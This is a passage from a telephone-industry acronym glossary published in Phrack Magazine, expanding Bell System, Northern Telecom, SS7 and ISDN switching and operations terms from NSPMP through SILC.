NSPMP Network service performance measurement plan
NSPMP Network switching performance measurement plan
NSPRR Network switching performance results report
NSQRYFAIL NS query fail
NSS Network support system
NSSD Network switched services district
NSSNCOMP NS SCP response message with a send notification
NSSNCOMP NS SCP response message with a send notification received at the switch
NSTAC National security telecommunications advisory committee
NSTNMSG NS termination notification message sent from the switch to the SCP
NSTS Network services test system
NSU Network support utilities
NSs Network system (i.e. DACS; SDACSL CDACSL OSU; CSU... etc)
NStA (Ger) PBX
NT Network termination
NT Northern telecom
NT Protection alarm-metallic-service code for LATA access
NT/S NT simulator SIPB7020
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble trunk to line - 1AESS network trouble
NT03 Network path trouble line to line - 1AESS network trouble
NT04 Network path trouble trunk to trunk - 1AESS network trouble
NT06 Hourly report of network frames made busy - 1AESS network trouble
NT1 NT serving layer 1 (NCTE)
NT10 Network path failed to restore -1AESS network trouble
NT2 NT serving layer 1 to 3 (subscriber interface of nt
NTC National trunk congestion
NTD Normal direction
NTDACT Network termination (NT) is deactivated.
NTE Network terminal equipment
NTE Network terminating equipment
NTEC Network technical equipment center
NTEC Network terminal equipment center
NTI Northern telecom inc.
NTIA National telecommunications and information agency
NTM Nt test mode (IOM2 monitor message)
NTN Number of tns to be assigned
NTO Network terminal option (IBM)
NTOFN NT off normal.
NTP Northern telecom practice (NTI)
NTPWR NT lost power.
NTRAP Network trouble analysis plan
NTS Network technical support
NTS Network test system
NTT No test trunk
NTTMP Network trunk transmission measurement plan
NTWRK Network
NU Protection alarm-service code for LATA access
NUA (international) network user address
NUA Network user address
NUA Network utilization analysis
NUC Nailed-up connection
NUI Network user identification
NUL Null
NUP National user part
NV Protective relaying/telegraph grade-service code for LATA access
NVM Non volatile memory (eeprom)
NW Telegraph grade facility-75 baud-service code for LATA access
NWB Network-busy (NTI)
NWK Adminnetwork administration budgets system
NWM Network management (NTI)
NWPK Network packs
NXX Refers to the central office designation of the telephone
NY Telegraph grade facility- 150 baud-service code for LATA access
NYNEX NYNEX corporation
NYNEX New york
NYPS National yellow pages services
NYPSA National yellow pages services association
O Priority.
O+I Originating plus incoming calls to a switching module.
O-LTM Optical line terminating multiplexer
O/S Operating system
OA Line equipment assignment option
OA Out of alignment
OA&M Operations
OA&M Operations administration and maintenance
OAM Office data administration system
OAP Operator services position system administrative processor
OASIS Office automation strategy for information systems
OASIS Overseas accounting settlement and information
OASYS Office automation system
OATQ OSPS ANSI TCAP query and reply
OATS Operator assistance tracking system
OBA Out of band announcement
OBF Ordering and billing forum
OBH Office busy hour
OBS Observed data rate
OC Office communication
OC Operating company
OC Operator centralization
OC&C Other charges and credits
OCAS OSPS customer account services
OCAS7 OSPS customer account services CCSS7/international CC validation
OCC Other common carrier
OCC Other common carriers
OCC Usage occupancy
OCCH Outgoing connections per circuit per hour
OCCS OSPS common channel signaling
OCCS Order control and coordination system (BTL)
OCE Other common carrier channel equipment
OCN Operating company number
OCOIN OSPS coin
OCP Optional calling plan
OCP Origination point code (SS7)
OCPDG Ocp data gathering
OCR Optical character reader (auerbach computer technology report)
OCR Optical character recognition (IBM)
OCRS Optical character recognition system
OCS Official communication services
OCS Old class of service
OCS/CTS Official communications services installation and
OCS/CTS Official communications services installation and maintenance cos
OCSDSELR OCS data station equipment location report
OCSOLRM Official communications services (OCS) on-line reference
OCTD OSPS centralized automatic message accounting tone decoder
OCU Office channel unit
ODA Office data administration
ODA Office data assembler
ODA Office document architecture
ODAC Operations distribution administration center
ODACCIN OSPS directory assistance (DA) call completion and intercept
ODB On-demand B-channel counts.
ODB Operations divestiture board
ODCS Official data communications service
ODD Office dependent data
ODD Operator distance dialing
ODDBU Office dependent data backup
ODDD Operator direct distance dialing
ODDS Order data distribution system
ODIN Online data integrity system
ODP Office dialing plan
ODP Organization development program
ODP Organizational design program
ODS Overhead data stream
ODS Tnds on-line demand servicing
OE Office equipment
OE Office equipment / office equipment number
OE Office equipment number
OEC Other exchange carrier
OEC Outside plant equivalence codes
OEIC Optoelectronic integrated circuit
OEIS OSPS external information system
OEM Original equipment manufacture
OEM Original equipment manufacturer
OF Official (telco owned)
OF Overflow
OFA OSPS facility administration
OFC Office
OFF OSPS fast features
OFF HK Off hook
OFFN Off-normal
OFL Overflow(s)
OFNPS Outstate facility network planning system
OFRD Offered (calls [peg count])(NTI)
OFRT Office route (NTI)
OFT Optical fiber tube
OGO Outgoing only trunk
OGT Outgoing trunk
OI Off premises intercommunication station line INTER/TRA blocal 1-2
OI Optical interface
OIJ Orders in jeopardy
OINTA OSPS interflow listing services/C-ACD measures
OIRCV OSPS interflow T&A calls received
OISNT OSPS interflow T&A calls sent
OKMDT Oklahoma management development training
OKP Operational kernel process
OKRA Operator keyed trouble report
OLCP Optional local calling plan
OLIDB OSPS line information data base
OLIPD Online invoice payment data
OLRM Online reference material
OLS Originating line screening
OLTEP Online test executive program
OLTS Optical loss test set
OM Operational measurement (NTI)
OM Operational measurements
OM Output mux
OMAP Operations and maintenance application part
OMAT Operations maintenance and administration team
OMC Operating and maintenance center
OMD Out messages - day
OMDB Output message data base
OMDB Output message database
OMISC OSPS miscellaneous call
OML Outgoing matching loss
OMM Output message manual
OMNI Online marketing networked information system
OMP SS7 fe operation management protocol
OMPF Operation and maintenance processor frame
ON Off network access line INTER/TRA blocal 1-26
ON HK On hook
ONA Open network architecture
ONA Open network architecture (FCC computer inquiry iii)
ONAC Operations network administration center in K.C. (AT&T)
ONAL Off network access line
ONALS Off-net access lines
ONC On line COSMOS
ONDDBOV OSPS NCD message received indicating database overload
ONDDBUN OSPS NCD message returned data base unable to process
ONDGMSG OSPS NCD message received garbled
ONDIRPY OSPS NCD message received with an inconsistent reply
ONDNBLK OSPS NCD message returned because of network blockage
ONDNCON OSPS NCD message returned because of network congestion
ONDNRTE OSPS NCD message returned because of no routing data
ONDTOUT OSPS NCD message returned because of timeout
ONDUNEQ OSPS NCD message returned
ONDURPY OSPS NCD message received with an unexpected reply
ONI Operator number identification
ONP Open network provision
ONPA Originating numbering plan area
ONS On line switch
ONSITE Urban decisions system
ONTC Office network and timing complex
ONTC Office network and timing complex (CM2 offices only)
ONTCCOM Office network and timing common units
OOB Out-of-band
OOC Originating office code
OOC Out-of-chain
OOF Out-of-frame
OP Off premises extension INTER/TRA blocal 1-26
OP Operation
OP Outside plant
OP ALL Option all
OPC Originating point code
OPC Originating point codes
OPCDB Operations common database
OPDU Operations protocol data unit (x.411: p3)
OPEOS Outside plant planning
OPH Operator handled
OPM Outage performance monitoring
OPM Outside plant module
OPN Open-of-day report
OPNOXL3 OSPS position no level 3 protocol.
OPR Operator
OPS Off-premises station
OPS Outside plant study system
OPSM Outside plant subscriber module
OPT Optional
OPU Outside plant cable usage
OPX Off-premises extension
OR Originating register
OR & RG Operating rate and route guide
ORB Office repeater bay
ORBIT Osp rehabilitation budget information tracker
ORC Originating rate center
ORD Service or work order
ORD Work order
ORD# Order number
ORDN Order number.
ORDNO Service order number
ORE Order edit
ORE-G Order edit global
ORI Order input
ORIG Allows originating
ORLF Originating register link frame
ORLMF Originating register line memory frame
ORM Optical remote module
ORM Optical remote switching module
ORM Optically remote switching module
ORMC Originating register marker connector
ORP Operational review plan
ORR Overflow reroute
ORRS Online records and reporting system (TNDS)
ORS Order send
ORTN Orientation
ORTR OSPS real-time rating
OS Off premises PBX station line INTER/TRA blocal 1-26
OS Operations systems (operations support systems) (OSS)
OS Operator service
OS Origination scanning
OS Out of service
OS Out sender
OS Outstate
OS/D Operator services/deaf
OSAC Operator services assistance center
OSAC Operator services of answer consistency
OSAM Overflow sequential access method (IBM)
OSAP Operations systems architecture plan
OSC Operator services center
OSC Oscillator
OSCAS Operator service control access system
OSDS Operating system for distributed switching
OSDS-C Operating system for distributed switching in the connection
OSDS-M Operating system for distributed in the switching module.
OSE Oscillator error flip-flop
OSI Open system interconnection
OSI Open systems interconnection
OSLF Out sender link frame
OSM1 Optional services menu screen number 1
OSN Operations systems network
OSO Originating screening office
OSO Originating signaling office
OSPE Outside plant engineer
OSPI Operator services planning information
OSPRE/CON Outside plant reconciliation
OSPS Operator service position system
OSPS Operator services position system
OSPS Outside plant studies
OSPS-DL OSPSystem data links
OSR Ongoing support request
OSS Operation support system
OSS Operations support system
OSS Operations support system (BTL)
OSS Operator service signalling
OSS Operator services system
OSSGR Operator services system generic requirements
OSSP Operations systems strategic plan
OSSS Operator services support system
OSTC Operations systems technical center
OT Originating traffic
OT Other type
OT Overtime
OTA OSPS toll and assistance
OTC Operating telephone company (in bell system)
OTDR Optical time domain reflectometers
OTER Operator team efficiency ratio
OTG Outgoing trunk group
OTH Other
OTO Office-to-office
OTR Operational trouble report
OTSS Off the shelf system
OTTS Outgoing trunk transmission system
OUC Origination unit code
OUT Outgoing trunk groups
OUTWATS Outward wats
OUTWATS Outward wide area telecommunications service
OVF Overflow (NTI)
OVLT Overvoltage protection
OVLY Overlay scheduling
OVOEQ OSPS call volume and equipment usage
OVRLD Overload or congestion control
OVRRNG Overrange
OVS Overseas
OVW Equipment class overwrite
OW Over-write
OWG Optical wave guide
OWT Outwats [code 024(5500-5600)]
OXPRESS Zero express
P Commitment time for having this trouble repaired.
P-tone Pseudo tone P/AR Peak-to-average ratio P/F Poll/final bit PA Power alarm PA Program address PA Program application PA Protective alarm (AC) INTER/TRA blocal 1-26 PABX Private automatic branch exchange PABX Private automatic branch exchange PAC Percent access chargeable PACE Program for arrangement of cables and equipment PACK Peripheral equipment packs PACT Prefix access code translator PAD Packet assembler/disassembler PADDLE Program for administering data bases in the lfacs PADS Planning analysis and decision support PADSX Partially automated digital signal cross-connect PAK Work packages PAL Pre-service action limit PAL Price analysis list PAL Pricing and loading (mcauto) PAL Purchasing authorization letter PAM Pass along method (SS7: in ISUP) PAM Primary access method PAM Pulse amplitude modulation PAN Panel PAN Personal account number PANDS Purchase & sales PANS Pretty advanced new stuff PAP Publications' accounts payable PAQS-10 Provisioning and quotation system PARMS Parameters PARTS Tvcom electronic parts inventory PAS Protocol architecture specification for IOS (PCT) PAS Public announcement service PAT Position attached signal time-out PAT Position attached signal time-out (MDII) PAT Power alarm test PATROL Old version of 'esscoer' PAX Private automatic exchange PAYRO1IC Payroll-information center PB Lajga PB Placement bureau PB Sdga PBC Peripheral board controller PBC Peripheral bus computer PBC Peripheral bus. computer PBC Processor bus controller PBD Pacific bell directory PBG Packet business group PBHC Peak busy hour calls PBM LTG = 0 ho/mo msg reg (no ANI) PBO Paperless business office PBOD Pac bell order dist. 
PBVS Pacific bell verification system PBX Private branch exchange PBXC Private branch exchange center PBXWL Private branch exchange wiring list PC Peg count PC Peripheral control (software) PC Power controller PC Primary center PC Process controller PC Switched digital-access line INTER/TRA blocal 1-26 PCA Philip crosby associates PCB Program communications block-IMS (IBM) PCC Peg count converters PCDA Program controlled data acquisition PCF-II Programming control facility-II (IBM) PCH Parallel channel PCI Panel call indicator PCID Primary circuit identification PCL Payroll change list PCL Pcm data clock PCM Program control module PCM Pulse code modulation PCN Personal communication network (UK) PCN Product change notices PCO Peg count and overflow PCO Plant control office PCP Primary control program PCR Preventive cyclic retransmission (SS7 in MTP) PCSN Public circuit switched network PCT IOS program coding tools (SDL oriented) PCTF Per-call test failure PCTF Per-call test failure. PCTV Program controlled transverters PD Peripheral decoder PDA Parameter data assembler PDA Partial dial abandon PDA Partial dial abandon (MDII) PDC Primary digital carrier PDF Power distribution frame PDI Power and data interface PDIT Prefix/feature digit interpreter PDM Power down mode PDN Public data network PDSP Peripheral data storage processor PDT Partial dial time-out PDT Partial dial time-out (MDII) PDU Protocol data unit (x.400) PE Peripheral equipment PE Program audio 200-3500 hz-service code for LATA access PECC Product engineering control center PEP Position establishment for parties PER For each.. 
or according to PER Protocol error record PF Printout follows PF Program audio 100-5000 hz-service code for LATA access PFM Pulse frequency modulation PFOFF Power feed off (C/I channel code) PFPU Processor frame power unit PFR Party line fill report PFR Polarity failure PFR Polarity failure (MDII) PFS Page format selection (teletex) PFS Pcm frame synchronisation signal PG Page PG Paging INTER/TRA blocal 1-26 PG Program document index PG Program frequency weighting PGTC Pair gain test controller PH Packet handler PH Parity high bit PH Pending header PH Protocol handler PH JTR Phase jitter PH- Physical- PHY Physical PIA Plug-in administrator PIC PCM interface controller PIC Plastic-insulated cable (plant) PIC Polyolefin insulated cables (plant) PIC Primary independent carrier (switching) PICB Peripheral interface control bus PICS Plug-in inventory control system PICS Plug-in inventory control system (PICS/DCPR) PICS/DCPR PICS/detailed continuing property records PID Personal ID PIDB Peripheral interface data bus PIINT Allow packet interface interrupt PIN Personal identification number PIOCS Physical i/o system PIP PCM interface port PIP Packet interface port PIU PCM interface unit PJ Program audio 50-8000 hz-service code for LATA access PK Program audio 50-15000 hz-service code for LATA access PKC Package category PKT Package type PL Parity low bit PL Private line PL Private line circuit number PL Private line-voice INTER/TRA blocal 1-26 PLAR Private line automatic ringdown PLC Physical link control (IOS) PLD Partial line down (teletex) PLGUP Plug-up (currently no affect). 
PLIC Pcm line interface PLL Phase locked loop PLU Partial line up (teletex) PM Peripheral module PM Peripheral modules PM Phase modulation PM Plant management PM Preventive maintenance PM Protective monitoring INTER/TRA blocal 1-26 PM01 Daily report - 1AESS plant measurements PM02 Monthly report - 1AESS plant measurements PM03 Response to a request for a specific section of report - 1AESS PM04 Daily summary of iC/Iec irregularities - 1AESS plant measurements PMAC Peripheral module access controller PMB LTG = 1 ho/mo regular ANI6 PMI Plant management instruction PMS Peripheral maintenance system pack PMS Peripheral maintenance system packs PMS Plant measurements system PMS HUB Picture phone meeting service hub PMU Precision measurement unit PN Pseudo noise (code) PNB Pacific northwest bell PNL Premis number list for TN PNP Private numbering plan (i.255 b) PNPN Positive-negative-positive-negative devices POB Peripheral order buffer POF Programmable operator facility POP Point of presence PORT Remote access test ports POS Centralized automatic message accounting positions (NTI) POS Position POS TOPS (DMS) position (NTI) POSN-P Posn-p POSNOB OSPS position no B-channel. POSNRSP OSPS position no response. POT Point of termination POTS Plain old telephone service POVT Provisioning on-site verification testing PP Post pay PPC Pump peripheral controller PPD Peripheral pulse distributor PPG Precedence and preemption group PPM Periodic pulse metering. PPN Public packet switching PPS Product performance surveys PPS Public packet switching network PPS Pulse per second PPSN Public packet switched network PPSRV Pre-post service. 
PPU Power providing unit PP_D_M Point-to-point data maintenance PQ Program grade customized-service code for LATA access PR Cable pair id PR Pair normally tip and ring PR Protective relaying-voice grade INTER/TRA blocal 1-26 PRA Primary rate access PRCA Puerto rico communications authority PRE Previous PREMIS Premises information system PRFX Prefix PRFX Prefix translations PRI Frame priority PRI Primary rate interface PROC Processor PROG Program PROM Programmable read-only memory PROMATS Programmable magnetic tape system PROT Protection PROTEL Procedure oriented type enforcing language PROTO Protocol circuit PRP Periodic purging of remarks PRP Permanent cable pair remarks PRS Personal response system PRT Print PRTC Puerto rico telephone company PRZ Preferred rate zone PS Msc constructed spare facility INTER/TRA blocal 1-26 PS Packet switching PS Previously published/non-published facility indicator PS Program store PSAP Public safety answering point PSC Prime service contractor PSC Public safety calling system PSC Public service commission PSD Programmable scanner distribution PSDC Public switched digital capability PSDN Packed-switched data network (t.70) PSDS Public switched digital service PSE Packet switch exchange PSF Packet switching facility PSGRP Packet switching groups PSHF Peripheral equipment shelf PSIU Packet switch interface unit PSK Phase shift keying PSK Phase-shift keying PSL IOS protocol source library PSM Packet service module PSM Position switching module PSN Packet switched network PSN Public switched network PSO Pending service order PSODB Packet switching on-demand B-channel PSOFC Packet switching office (ISDN) PSPDN Packed-switched public data network PSPH Packet switching PH/DSLG (ISDN) PSPORT packet switching protocol handler (PH) port (ISDN) PSR Phase shift register PSS Packet switch stream PSS Packet switched services PSSM Packet switching per switching module (ISDN) PST Permanent signal time-out PST Permanent signal time-out (MDII) PST 
Pre-service testing PST Sides protocol software development PSTG Packet switching trunk group PSTLT Pre-service transmission action limit table PSTN Public switched telephone network PSTN Public switched telephone network (t.70) PSU Packet switch unit PSU Packet switch unit. PSU Program storage unit PSUPH Packet switch unit protocol handler PSW Program status word PSWD Password access PT Package time PT Point PT Program timer PTAT Private trans atlantic telecommunications PTCL Protocol PTD Plant test date PTR Printer PTT Postal telephone and telegraph PTW Primary translation word PTY Party indicator PTY Party number or position PU Power units PU Power up (C/I channel code) PUC Peripheral unit controller PUC Public utilities commission PULS Message-rate pulsing table (AMA NTI) PULS Pulse PULSG Pulsing PUM Pu mode PUMPHW Pump hardware errors PV Protective relaying-telegraph grade INTER/TRA blocal 1-26 PVC Permanent virtual circuit PVC Permanent virtual circuit (x.25 network) PVC Permanent virtual circuits PVN Private virtual network PVT Private PW Protective relaying-signal grade INTER/TRA blocal 1-26 PWC Premis wire center PX Pbx station line INTER/TRA blocal 1-26 PX Power cross. PZ Msc constructed circut INTER/TRA blocal 1-26 Q Report class. see table 5-1. Q-CIF Quarter cif (for ISDN low end video) QAM Quadrature-amplitude modulation QANN Announcements for queuing (MLHG) QAS Quasi-associated signaling QEX Question an execution QMLHG Queuing for multi-line hunt group QMP Quality measurement plan QPA Quality program analysis QRSS Quasi random signal source QS Packet synchronous access line INTER/TRA blocal 1-26 QSC Quad s interface circuit peb2084 QSF Queuing for simulated facility QSS Quality surveillance system QTAM Queued telecom access method QTG Queuing for trunk groups QU Packet asyncronous access line INTER/TRA blocal 1-26 QUE Queue R Initials and location of person reporting this trouble. 
R Review pending dispatch R Ring R&R Rate & route R&SE Research & systems engineering R-GRD Ring-to-ground R-T Ring-to-tip R/O Read/only R/W Read write R/WM Read/write memory R1 Regional signaling system 1 (based on CCITT SS5 (2600)) R2 Regional signaling system 2 (based on CCITT SS4 (2400)) RA Rate adaption RA Ready access RA Remote attendant INTER/TRA blocal 1-26 RACF Remote activated call forwarding RAD Receive adress RAF Recorded announcement facility RAF Recorded announcement function RAF Recorded announcement function (DSU2) RAL Relay assignment list RAM Random access memory RAM Random-access memory RAND Rural area network design RAO Regional accounting office RAO Revenue account office RAO Revenue accounting office RAP Recorded announcement port. RAP Relay assignment parameters RAP Rotary assignment priority RAR Return address register RAS Release sequence number lists and related TN/OE RAS Remote access services RASC Residence account service center RAT Rating RATDBOV RATE message received indicating data base overload RATDBUN RATE message returned because data base unable to process RATGMSG RATE message received garbled RATNBLK RATE message returned because of network blockage RATNCON RATE message returned because of network congestion RATNRTE RATE message returned because of no routing data RATTOUT RATE message returned because of timeout RATUNEQ RATE message returned because of unequipped destination RATURPY RATE message received with an unexpected reply RAU RSM alarm RBEF Read block error counter for far end (IOM2 monitor command) RBEN Read block error counter for near end (IOM2 monitor command) RBHC Regional bell holding company RBOC Regional bell operating company RBOC Regional boc RBOR Request basic output report RBS Print tbs relays assignment record RC Rate center (NTI) RC Recent change RC Regional center RC Resistance-capacitance RC/V Recent change and verify RC18 Rc message response - 1AESS RC RCC Radio common carrier RCC Remote cluster 
controller RCC Request corrupted CRC (in EOC) RCC Reverse command channel RCD Received RCE Ring Counter Error RCF Remote call forward RCF Remote call forwarding RCFA Remote call forwarding appearance (NTI) RCI Read controller interface (IOM2 monitor command) RCL Route clock RCLDN Retrieval of calling line directory number RCLK Remote clock RCM Remote carrier module RCMAC Recent change memory administration center RCMG Recent change message generator RCOSC Remote clock oscillator RCOXC Remote clock oscillator cross couple RCP Recent change packager RCP Remote copy RCR Recent change report RCRE Receive corrected reference equivalent RCREF Remote clock reference RCS Recent change summary RCSC Remote spooling communications subsystem RCT Remote concentrator terminal RCU Radio channel unit RCU Repeater control unit (i.e. ASIC between two IEC-q2s) RCV Receive RCVR Receiver RCW Recent change keyword RCXC Remote clock cross couple RDATE Release date (update database date) RDB/RDR Recent Disconnect bussiness/resid. 
RDBM Relational data base management RDES Remote data entry system RDFI RSM digital facilities interface RDG Message register reading RDS Radio digital system RDS Reference distribution system RDS Running digital sum RDSN Region digital switched network RDT Radio digital terminal RDT Remote digital terminal RDY Resynchonisation indication after loss of framing (C/I channel CO) RE Lajrr RE Radiated emission (EME) REACC Reaccess REC Record REC Recreate (display) REC Regional engineering center RED Recent change message text editor REH Recovered history REJ Reject (LAP-D command/response) REL Release (i.451) REL Release non-intercepted numbers by release date REM Remote equipment module REM Remove frame locations REMOBS Remote observation system REMSH Remote shell REN Ring equivalence number REOC Real estate operations center REP Reprint option REPT# Report number REQ Required RES Reset (C/I channel code) RES Resistance RES Resume (i.451) RES Send a solicited response RES1 Reset receiver (C/I channel code) RET Retermination of frame locations REV Reverse charging (i.256 c) REV Reversed REW Rework status REX Reexecute a service order REX Routine exercise. REX Routine exerciser. REXX Restructred extended executer language RF Radio frequency RFI Radio frequency interference RID Read identification (IOM2 monitor command) RID Remote isolation device RISLU Remote integrated services line unit RJ Reject RJDT Reject date RJR Remove jeopardy reason codes RJR Valid reject reasons RKW (ger pcm30) fas RL Repeat later RL Resistance lamp RL Retry later RL Return loss RLC Release complete msg. (SS7: in SCCP) RLCM Remote line concentrating module RLDT Release date RLF Re-using dips upper bound load factor RLG Release guard on unstable call (outgoing) RLI Remote link interface RLM Remote line module RLO Automatic relay assignment present RLOGIN Remote login RLS Release RLSD Released msg. 
(SS7: in SCCP) RLST Release status RLT Remote line test RLT Remote loop test RLY Miscellaneous relay RM Remark RMA Request for manual assistance RMAC Remote memory administration center RMAS Recent message automatic system RMAS Remote memory administration RMAS Remote memory administration system RMK Hunt group remarks RMK Remarks RMK Remarks on cable pair RMK Remarks on office equipment RMK Remarks on orders RMK Remarks on telephone number RMM Remote maintenance module RMP Recent change punctuation table RMPK Remote shelf RMR Remote message registers RMS Remote mean square RMS Root-mean-square RMS-D Remote measurment system-digital RMS-D1 Remote measurment system-digital signal level one RMS-D1A Remote measurment system-digital signal level one access RMS-M Remote measurment system-metallic (through SMAS) RMS-MS Remote measurment system-metallic small (through SMAS) RMV Remove RMV Removed from service - 1AESS remove RN Reference noise RN Ring node RNA Release telephone numbers for assignment RNG Ringing RNGS Rings RNMC Remote network management center RNO Rss subentity number RNOC Regional network operations center RNR Receive not ready (LAP-D command/response) RO Receive only RO Routine other. ROB Remote order buffer ROC Regional operating company RODD Redundant ODD ROE Reservation order establishment ROE Rss's office equipment ROH Receiver off hook ROI Reservation order inquiry ROK Republic of korea ROM Read-only memory ROOT System manager for some unix os and COSMOS ROP Receive-only printer ROSE Remote operation service element (TCAP subset) ROTF Operational trouble. 
ROTL Remote office test line ROTLS Remote office testline system ROUT Routes ROW Reservation order withdrawal RP Repeater RPFC Read power feed current value (IOM2 monitor command) RPM Recent change parameters RPO Regional procurement organization RPOA Recognized private operating agency RPT Repeated RPT Report RQ Rpntr RQS Rate/quote system RQSM Regional quality service management RQST Request RR Receive ready (LAP-D command/response) RRCLK Remote clock circuit pack RRO Reports receiving office RS Radiated susceptibility (EMS) RS Record separator (ascii control) RS Repair service RS Reset RSA Repair service attendant RSAT Reliability and system architecture testing RSB Repair service bureau RSB Repair service bureau RSC Remote switching center RSC Reset confirm (SS7: in SCCP and ISUP) RSC Residence service center RSCS Remote source control system RSE Remote service equipment RSHF Remote concentration line shelf RSIT Remote site RSLC Remote subscriber line module controller RSLE Remote subscriber line equipment RSLM Remote subscriber line module RSM Remote switching module RSS Remote switching system RST Reset received (outgoing) RST Resistance test RST Resistance test (SARTS command) RST Restore RST Restored to service status - 1AESS restore RSTS/E Resource system time sharing/enhanced RSU Remote switching unit RSY Resynchronizing (C/I channel code) RSYD Rsy downstream RSYU Rsy upstream RT Radio landline INTER/TRA blocal 1-26 RT Remote terminal RT Remote terminal (opposite to cot) RT04 Status of monitors - ringing and tone plant-1AESS RTA Remote trunk arrangement RTA Remote trunking arrangement RTAC Regional Technical Assistance Center RTAC Remote a trunk assembler center RTB Retransmission buffer RTCA Radio technical commission of aeronautics RTEST Tops remote test RTF Release timeout failure RTH Report transaction to count spare and diped line equipment RTI Route index RTIME Release time (update database time) RTL Resistor-transistor logic RTM Regional 
telecommunications management RTM Remote test module RTN Return to normal (in EOC) RTOC Resident telephone order center RTP Rate treatment package RTP Remote test point (RTS-5A) RTPP Remote test port panel RTR Route TReatment (GTE) RTRV Retrieve RTS Relay and telephone number status report RTS Remote test unit RTS Remote testing system RTS Request to send RTS SMAS remote test system located in central offices RTSE Reliable transfer service element RTSI Receive time slot interchanger RTU Remote trunking unit RTU Right to use RTZ Rate zone RU Receive unit RUM Remote user multiplex RUP Request unsolicited processing RV Review RVDT Review date and time RVPT Revertive pulsing transceiver RVPT Revertive pulsing transceivers RW Read/write permission RWC Remote work center RX Remote exchange RZ Resistance zone RZ Return to zero RxSD Receive serial data

==Phrack Magazine==

Volume Four, Issue Forty-Three, File 25 of 27

{Acronyms Part V}

S Date and time report received. S Seconds S Send to screener S Sleeve S Start dial signal S&E Service & equipment S- Supervisory (S-frames) S-N Signal-to-noise ratio S/R Send/receive key S1DN Stage one distribution network S96 SLC 96 SA Satellite trunk INTER/TRA blocal 1-26 SA01 Call store memory audit results - 1AESS software SAA System applications architecture (for ps/2) SABME Set asynchronous balanced mode (ABM) extended (LAP-D command) SAC Service access connector (-> sipb) SAC Service area computer SAC Special area code SAC Switch activation SAD System access delay SAG Street address guide SAI S activity indicator (in EOC) SAI Serving area interface SAI Summary of action items SALI Standalone automatic location identification SAM Subsequent address msg. 
(SS7: in ISUP) SAMA Step by step automatic message accounting SAMEM Stand-alone billing memory SANE Signaling area/network code (SS7) SAP Service access point SAPI Service access point identifier SAR Store address register SARTS Switch access tremote test system SARTS Switched access remote test system SAS Switched access service SASWF Save all seems well failure flip flop SAT Special access termination SAT Supervisory audio tone SAT System access terminal SAW Surface acoustic wafe (filter) SB Switched access-standard-service code for LATA access SBC S bus interface circuit SBCX SBC extended SBI Synchronous backplane interconnect SBLN Standby line SBMS Southwestern bell mobile service SBS Skyline business systems SBUC S bus connector SC Scanner controller SC Sectional center SC System controller SC/SD Scan and signal distributor SCA Service order completion-automatic SCANS Software change administration and notification system SCAT Stromberg-carlson assistance team SCC Specialized common carrier SCC Station cluster controller SCC Switching control center SCC Switching control center. 
SCCP Signaling ccp (SS7: q.71x) SCCP Signaling connection control part SCCS Specialized common carrier service SCCS Switching control center system SCF Selective call forwarding SCF Simple completion for mdf SCH Test scheduale (command) SCHED Scheduled SCI Spare cable pair inquiry SCL Station clock SCLK Slave clock SCM Scramble coder multiplexer SCM Standard completion by mdf SCM Subscriber carrier module SCM Subscriber carrier module (DMS-1 digital pair gain system NTI) SCO Serving central office SCOT Stepper central office tester SCOTS Surveillance & control of transmissions system SCP Service control point SCP Service order completion by LAC SCP Signal control point SCP Signal conversion point SCP System control program SCPC Signal channel per carrier SCPD Supplementary central pulse distributor SCR Selective call rejection SCR Signaling configuration register SCR Standard completion by rcmac SCRC Send corrected reference equivalent SCRN Screening translations SCS SCM-10S Shelf (SLC-96) SCS SCM-10S shelf (SLC-96) SCSDH Scanner and signal distributor handler SCU Selector control unit SCX Specialized communications exchange SD Slip detected SD Switched access-improved-service code for LATA access SD&D Specific development & design SDACS Serving digital accessed and cross-connect system SDC Sales development center SDD Site dependent data SDDF Subscriber digital distributing frame SDE Submission/delivery entity (x.400) SDIS Switched digital integrated service SDL Specification and description language SDLC Synchronous DLC SDLC Synchronous data link control SDLH Synchronous data link handler SDM Space division multiplex SDN Software defined network SDN Software-defined network SDNBAS Call failed due to the query's being blocked at the switch SDNBN Call failed due to the query's being blocked in the CCS network SDNGTCAP Garbled TCAP message received SDNNCANI CAMA call failed due to CAMA trunk's not providing ANI for query SDNNCFA Call failed while the transaction 
with the NCP was active SDNNCFI Call failed while the transaction with the NCP was inactive SDNNOCANI CAMA call failed due to CAMA trunk's not providing ANI through ONI for query SDNRER Call failed because to the conversation with the NCP resulted in a return error SDNRER Call failed because to the conversation with the NCP resulting in a return error SDNRR Call failed because to the conversation with the NCP resulted in a reject respon SDNRR Call failed because to the conversation with the NCP resulting in a reject respo SDNTIM Call failed due to the query's not being answered in time by the NCP SDNTRF Call failed due to the NCP's answering with a terminate request SDOC Selective dynamic overload controls SDP Service delivery point SDP Submission and delivery protocol (x.411) SDPT Signal distribution points SDR Store data register SDR Switch data report SDS Switched data service SDS Synchronous data set SDSC Synchronous data set controller SDT Software development tools SE Special access wats-access-std-service code for LATA access SE Special service equipment number SEAS Signaling engineering and administration system SEAS Signalling engineering and administration systems SEC Second SEC Signal level behind the echo canceller (C/I channel code) SEE Systems equipment engineering SEG Segment SEL Digital selector (in TMS) SEL Selecting lines for an exchange class of service study SER# Seral number SES Service evaluation system SES Unk (administrative system) SET Statistics on equipment and telephone numbers SET Strategy execution table SF Service field SF Signal format SF Single frequency. SF Special access- WATS access line improved-service code for LATA SF Status field (SS7) SFB Set next febe to zero SFD Superframe detected (C/I channel code) SFG Simulated facilities SFG Simulated facilities group SFG Simulated facility group SFG Simulated facility group (SFG) measures. 
SFMC Satellite facility management center SFN Simulated facility number SFV Signal format verification SFV Signaling format verification (SARTS command) SG Control/remote metering signal grade INTER/TRA blocal 1-26 SG Supergroup SG Switch group (SG) (also known as half-grid) SGC Switching group control SGD Failure to receive station group designator (SGD) SGH Select graphic rendition (teletex) SGH Supply relays for groups of 5xb hunts SGL Single SGML Standard generic markup language SGMP Simple gateway management protocol SGN Common language segment number SHI Select horizontal spacing (teletex) SI Sequenced information SI Service indicator SI Shift in (ascii control) SI Status indicator SI Synchronous interface SIC Silicon integrated circuit SICOFI Signal processing codec filter SICOFI2 2 channel sicofi SID System identification SIDB Session information data base SIDES Siemens ISDN software development and evaluation system SIF Signaling information field (SS7) SIG Signaling SIG Signaling equipment (in a trunk) SIGI Sigi SIGS Signaling strobe SILC Selective incoming load control SILC Selective incoming load controls messages. 
